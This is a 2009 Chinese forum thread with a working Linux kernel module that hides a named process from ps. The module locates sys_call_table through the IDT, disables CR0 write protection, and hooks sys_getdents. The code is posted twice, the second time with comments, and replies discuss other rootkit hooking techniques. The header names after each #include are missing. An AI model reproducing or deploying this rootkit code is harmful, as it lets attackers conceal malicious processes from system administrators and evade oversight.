[原创]关于劫持系统调用隐藏进程的一些心得
网上很多类似的文章,其中很多示例程序都是在比较老的内核版本上测试过,很多在新的内核下根本无法运行,我收集了一些相关的资料,并给出一个在linux内核2.6.28(ubuntu9.04)上可以运行的程序代码.相比其他一些文章,修改如下:1.增加了两个函数,清CR0的第20位,不然在替换sys_call_table的时候会报段错误.
unsigned int clear_and_return_cr0(void);
void setback_cr0(unsigned int val);
2.针对ubuntu9.04中,ps命令用的系统调用是sys_getdents,不是sys_getdents64(在suse系统里面用的是sys_getdents64),所以程序中劫持的是sys_getdents的系统调用.
关于隐藏进程的原理,可以查看其他相关文章,主要是通过int 0x80 找sys_call_table的地址.
博客地址:[url]http://blog.chinaunix.net/u3/103654/showart.php?id=2053976[/url]
测试环境: ubuntu9.04 内核版本2.6.28
模块代码如下:
/*hideps.c*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
//#include
#define CALLOFF 100
//使用模块参数来定义需要隐藏的进程名
int orig_cr0;
char psname[10]="looptest";
char *processname=psname;
//module_param(processname, charp, 0);
struct {
unsigned short limit;
unsigned int base;
} __attribute__ ((packed)) idtr;
struct {
unsigned short off1;
unsigned short sel;
unsigned char none,flags;
unsigned short off2;
} __attribute__ ((packed)) * idt;
struct linux_dirent{
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[1];
};
void** sys_call_table;
unsigned int clear_and_return_cr0(void)
{
unsigned int cr0 = 0;
unsigned int ret;
asm volatile ("movl %%cr0, %%eax"
: "=a"(cr0)
);
ret = cr0;
/*clear the 20th bit of CR0,*/
cr0 &= 0xfffeffff;
asm volatile ("movl %%eax, %%cr0"
:
: "a"(cr0)
);
return ret;
}
void setback_cr0(unsigned int val)
{
asm volatile ("movl %%eax, %%cr0"
:
: "a"(val)
);
}
asmlinkage long (*orig_getdents)(unsigned int fd,
struct linux_dirent __user *dirp, unsigned int count);
char * findoffset(char *start)
{
char *p;
for (p = start; p < start + CALLOFF; p++)
if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')
return p;
return NULL;
}
int myatoi(char *str)
{
int res = 0;
int mul = 1;
char *ptr;
for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)
{
if (*ptr < '0' || *ptr > '9')
return (-1);
res += (*ptr - '0') * mul;
mul *= 10;
}
if(res>0 && res< 9999)
printk(KERN_INFO "pid=%d,",res);
printk("\n");
return (res);
}
struct task_struct *get_task(pid_t pid)
{
struct task_struct *p = get_current(),*entry=NULL;
list_for_each_entry(entry,&(p->tasks),tasks)
{
if(entry->pid == pid)
{
printk("pid found=%d\n",entry->pid);
return entry;
}
else
{
// printk(KERN_INFO "pid=%d not found\n",pid);
}
}
return NULL;
}
static inline char *get_name(struct task_struct *p, char *buf)
{
int i;
char *name;
name = p->comm;
i = sizeof(p->comm);
do {
unsigned char c = *name;
name++;
i--;
*buf = c;
if (!c)
break;
if (c == '\\') {
buf[1] = c;
buf += 2;
continue;
}
if (c == '\n')
{
buf[0] = '\\';
buf[1] = 'n';
buf += 2;
continue;
}
buf++;
}
while (i);
*buf = '\n';
return buf + 1;
}
int get_process(pid_t pid)
{
struct task_struct *task = get_task(pid);
// char *buffer[64] = {0};
char buffer[64];
if (task)
{
get_name(task, buffer);
// if(pid>0 && pid<9999)
// printk(KERN_INFO "task name=%s\n",*buffer);
if(strstr(buffer,processname))
return 1;
else
return 0;
}
else
return 0;
}
asmlinkage long hacked_getdents(unsigned int fd,
struct linux_dirent __user *dirp, unsigned int count)
{
//added by lsc for process
long value;
// struct inode *dinode;
unsigned short len = 0;
unsigned short tlen = 0;
// struct linux_dirent *mydir = NULL;
//end
//在这里调用一下sys_getdents,得到返回的结果
value = (*orig_getdents) (fd, dirp, count);
tlen = value;
//遍历得到的目录列表
while(tlen > 0)
{
len = dirp->d_reclen;
tlen = tlen - len;
printk("%s\n",dirp->d_name);
if(get_process(myatoi(dirp->d_name)) )
{
printk("find process\n");
//发现匹配的进程,调用memmove将这条进程覆盖掉
memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);
value = value - len;
printk(KERN_INFO "hide successful.\n");
}
if(tlen)
dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen);
}
printk(KERN_INFO "finished hacked_getdents.\n");
return value;
}
void **get_sct_addr(void)
{
unsigned sys_call_off;
unsigned sct = 0;
char *p;
asm("sidt %0":"=m"(idtr));
idt = (void *) (idtr.base + 8 * 0x80);
sys_call_off = (idt->off2 << 16) | idt->off1;
if ((p = findoffset((char *) sys_call_off)))
sct = *(unsigned *) (p + 3);
return ((void **)sct);
}
static int filter_init(void)
{
//得到sys_call_table的偏移地址
sys_call_table = get_sct_addr();
if (!sys_call_table)
{
printk("get_act_addr(): NULL...\n");
return 0;
}
else
printk("sct: 0x%x\n", (unsigned int)sys_call_table);
//将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents
orig_getdents = sys_call_table[__NR_getdents];
orig_cr0 = clear_and_return_cr0();
sys_call_table[__NR_getdents] = hacked_getdents;
setback_cr0(orig_cr0);
printk(KERN_INFO "hideps: module loaded.\n");
return 0;
}
static void filter_exit(void)
{
orig_cr0 = clear_and_return_cr0();
if (sys_call_table)
sys_call_table[__NR_getdents] = orig_getdents;
setback_cr0(orig_cr0);
printk(KERN_INFO "hideps: module removed\n");
}
module_init(filter_init);
module_exit(filter_exit);
MODULE_LICENSE("GPL");
makefile文件如下:
obj-m :=hideps.o
EXTRA_CFLAGS := -Dsymname=sys_call_table
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules
clean:
$(RM) -rf .*.cmd *.mod.c *.o *.ko .tmp*
编写一个测试程序looptest.c,如下:
#include
int main(void)
{
while(1);
return 0;
}
编译该测试程序,#gcc looptest.c -o looptest
并将该程序在后台运行,然后insmod 驱动模块hideps.ko,然后输入ps查看进程,可发现,looptest进程看不到了....
[[i] 本帖最后由 g84ch 于 2009-9-17 10:07 编辑 [/i]] 好文章。不知LZ的这个程序和内核版本关联紧密否,手头上只有2.6.18的内核。
回复 #1 g84ch 的帖子
可以看一下这个:[url]http://blog.chinaunix.net/u/12592/showart_1903466.html[/url]
回复 #2 Godbach 的帖子
2.6.18?是redhat的release吧,呵呵,应该是可以的,不过红帽中对ps的系统调用是sys_getdents还是sys_getdents64,这我没有去看,在ubuntu9.04中用的是sys_getdents,所以我程序里面劫持的它.回复 #3 CUDev 的帖子
代码的那个文件下载了是乱码,你能传个附件到这里来吗?谢谢...呵呵...回复 #4 g84ch 的帖子
对,RH发行了2.6.18的内核版本,不过我自己也从kernel.org上下载了干净的2.6.18.3的内核,现在玩的就自己下载的回复 #4 g84ch 的帖子
strace一下,看是哪个系统调用 我觉得两点可以改系统调用:lol: 一 在lib库里可以改动系统用 二 在call.s可以改 至于调用的函数你可以自己定义回复 #5 g84ch 的帖子
cublog的附件处理将tar.gz全部改为了.tgz后缀,可能会导致解压的时候直解压到tar文件。再对tar文件解压即可。或者是tar xzvf xxxx.tgz 好贴,支持。:outu:utu:" />
追加了点注释。
[code]/*hideps.c*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
//#include
#define CALLOFF 100
//使用模块参数来定义需要隐藏的进程名
int orig_cr0;
char psname[10] = "looptest";
char *processname = psname;
//module_param(processname, charp, 0);
// idtr register
struct {
unsigned short limit;// 16 bit(bit0-15)
unsigned int base; // 32 bit(bit16-47)
} __attribute__ ((packed)) idtr;
// idt entity(8byte)
struct {
unsigned short off1; // offset bit0-15(bit0-15)
unsigned short sel; //segment selector (bit16-31)
unsigned char none,flags; //none:(bit32-39), flag:(bit40-47)
unsigned short off2; //offset bit16-31(bit48-63)
} __attribute__ ((packed)) * idt;
struct linux_dirent{
unsigned long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[1];
};
void** sys_call_table;
//clear bit19(20th bit) of cr0 and return original cr0
unsigned int clear_and_return_cr0(void)
{
unsigned int cr0 = 0;
unsigned int ret;
asm volatile ("movl %%cr0, %%eax"
: "=a"(cr0)
);
ret = cr0;
/*clear the 20th bit of CR0,*/
cr0 &= 0xfffeffff;
asm volatile ("movl %%eax, %%cr0"
:
: "a"(cr0)
);
return ret;
}
// restore cr0 with original value
void setback_cr0(unsigned int val)
{
asm volatile ("movl %%eax, %%cr0"
:
: "a"(val)
);
}
// original system call func
asmlinkage long (*orig_getdents)(unsigned int fd,
struct linux_dirent __user *dirp, unsigned int count);
// get addr start with 0xff 0x14 0x85
char * findoffset(char *start)
{
char *p;
for (p = start; p < start + CALLOFF; p++)
// In x86 machine code, call *sys_call_table(,%eax,4)
// is translated to 0xff 0x14 0x85
// the 4 ‘addr’ bytes form the address of 'sys_call_table[]'
if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')
return p;
return NULL;
}
// convert a digital string to int
int myatoi(char *str)
{
int res = 0;
int mul = 1;
char *ptr;
for (ptr = str + strlen(str) - 1; ptr >= str; ptr--)
{
// not digit
if (*ptr < '0' || *ptr > '9')
return (-1);
res += (*ptr - '0') * mul;
mul *= 10;
}
if(res>0 && res< 9999)
printk(KERN_INFO "pid=%d,",res);
printk("\n");
return (res);
}
// get task_struct by pid
struct task_struct *get_task(pid_t pid)
{
struct task_struct *p = get_current(),*entry=NULL;
list_for_each_entry(entry,&(p->tasks),tasks)
{
if(entry->pid == pid)
{
printk("pid found=%d\n",entry->pid);
return entry;
}
}
printk(KERN_INFO "pid=%d not found\n",pid);
return NULL;
}
// get task's name
static inline char *get_name(struct task_struct *p, char *buf)
{
int i;
char *name;
name = p->comm;
i = sizeof(p->comm);
do {
unsigned char c = *name;
name++;
i--;
*buf = c;
if (!c)
break;
if (c == '\\') {
buf[1] = c;
buf += 2;
continue;
}
if (c == '\n')
{
buf[0] = '\\';
buf[1] = 'n';
buf += 2;
continue;
}
buf++;
}
while (i);
*buf = '\n';
return buf + 1;
}
// check if pid is which we want to hook
int get_process(pid_t pid)
{
struct task_struct *task = get_task(pid);
// char *buffer[64] = {0};
char buffer[64];
if (task)
{
get_name(task, buffer);
// if(pid>0 && pid<9999)
// printk(KERN_INFO "task name=%s\n",*buffer);
if(strstr(buffer,processname))
return 1;
else
return 0;
}
else
return 0;
}
//hook func
asmlinkage long hacked_getdents(unsigned int fd,
struct linux_dirent __user *dirp, unsigned int count)
{
//added by lsc for process
long value;
// struct inode *dinode;
unsigned short len = 0;
unsigned short tlen = 0;
// struct linux_dirent *mydir = NULL;
//end
//在这里调用一下sys_getdents,得到返回的结果
value = (*orig_getdents) (fd, dirp, count);
tlen = value;
//遍历得到的目录列表
while(tlen > 0)
{
len = dirp->d_reclen;
tlen = tlen - len;
printk("%s\n",dirp->d_name);
if(get_process(myatoi(dirp->d_name)) )
{
printk("find process\n");
//发现匹配的进程,调用memmove将这条进程覆盖掉
memmove(dirp, (char *) dirp + dirp->d_reclen, tlen);
value = value - len;
printk(KERN_INFO "hide successful.\n");
}
if(tlen)
dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen);
}
printk(KERN_INFO "finished hacked_getdents.\n");
return value;
}
void **get_sct_addr(void)
{
unsigned sys_call_off;
unsigned sct = 0;
char *p;
// get idtr using sidt
asm("sidt %0":"=m"(idtr));
// get system_call idt
idt = (void *) (idtr.base + 8 * 0x80);
// get offset(address of system_call func)
sys_call_off = (idt->off2 << 16) | idt->off1;
// get call *sys_call_table(,%eax,4)
if ((p = findoffset((char *) sys_call_off)))
// add 0xff 0x14 0x85 3bytes
sct = *(unsigned *) (p + 3);
// sys_call_table
return ((void **)sct);
}
static int filter_init(void)
{
//得到sys_call_table的偏移地址
sys_call_table = get_sct_addr();
if (!sys_call_table)
{
printk("get_act_addr(): NULL...\n");
return 0;
}
else
printk("sct: 0x%x\n", (unsigned int)sys_call_table);
//将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents
orig_getdents = sys_call_table[__NR_getdents];
orig_cr0 = clear_and_return_cr0();
sys_call_table[__NR_getdents] = hacked_getdents;
setback_cr0(orig_cr0);
printk(KERN_INFO "hideps: module loaded.\n");
return 0;
}
static void filter_exit(void)
{
orig_cr0 = clear_and_return_cr0();
if (sys_call_table)
sys_call_table[__NR_getdents] = orig_getdents;
setback_cr0(orig_cr0);
printk(KERN_INFO "hideps: module removed\n");
}
module_init(filter_init);
module_exit(filter_exit);
MODULE_LICENSE("GPL");[/code]
[[i] 本帖最后由 chenbdchenbd 于 2009-9-17 18:43 编辑 [/i]]
回复 #10 chenbdchenbd 的帖子
感谢感谢~~~ 2.6.18.3的内核,编译完之后先insmod内核模块,系统死掉,没有任何打印信息。 先执行那个程序,然后再insmod也死掉。看来可以慢慢调试一把了,呵呵。回复 #13 Godbach 的帖子
可以试试把清CR0寄存器的那两步操作给去掉,再试试... [quote]原帖由 [i]g84ch[/i] 于 2009-9-22 09:49 发表 [url=][img]http://linux.chinaunix.net/bbs/images/common/back.gif[/img][/url]可以试试把清CR0寄存器的那两步操作给去掉,再试试... [/quote]
2.6下不清的话,应该是只读的吧。昨天也看了albcamus版主的那个帖子。 用这种方法是最稳定的进程隐藏方式了, 不过也tooooooooooooooooooooooold了, 稍微新点的可以patch vfs层函数指针的方法, 或者现在用inlinke hook filldir64函数的方式~
回复 #14 g84ch 的帖子
我也还没试,你知道是什么问题了吗?如果知道,分享一下吧....呵呵....回复 #16 W.Z.T 的帖子
感谢这位大哥赐教~~~ [quote]原帖由 [i]g84ch[/i] 于 2009-9-23 09:33 发表 [url=][img]http://linux.chinaunix.net/bbs/images/common/back.gif[/img][/url]我也还没试,你知道是什么问题了吗?如果知道,分享一下吧....呵呵.... [/quote]
LZ,你说没试,是指的你的程序还是其他? [quote]原帖由 [i]g84ch[/i] 于 2009-9-23 09:34 发表 [url=][img]http://linux.chinaunix.net/bbs/images/common/back.gif[/img][/url]
感谢这位大哥赐教~~~ [/quote]
不好意思, 看成是文件的隐藏了, filldir64是用来隐藏文件的:lol:
页:
[1]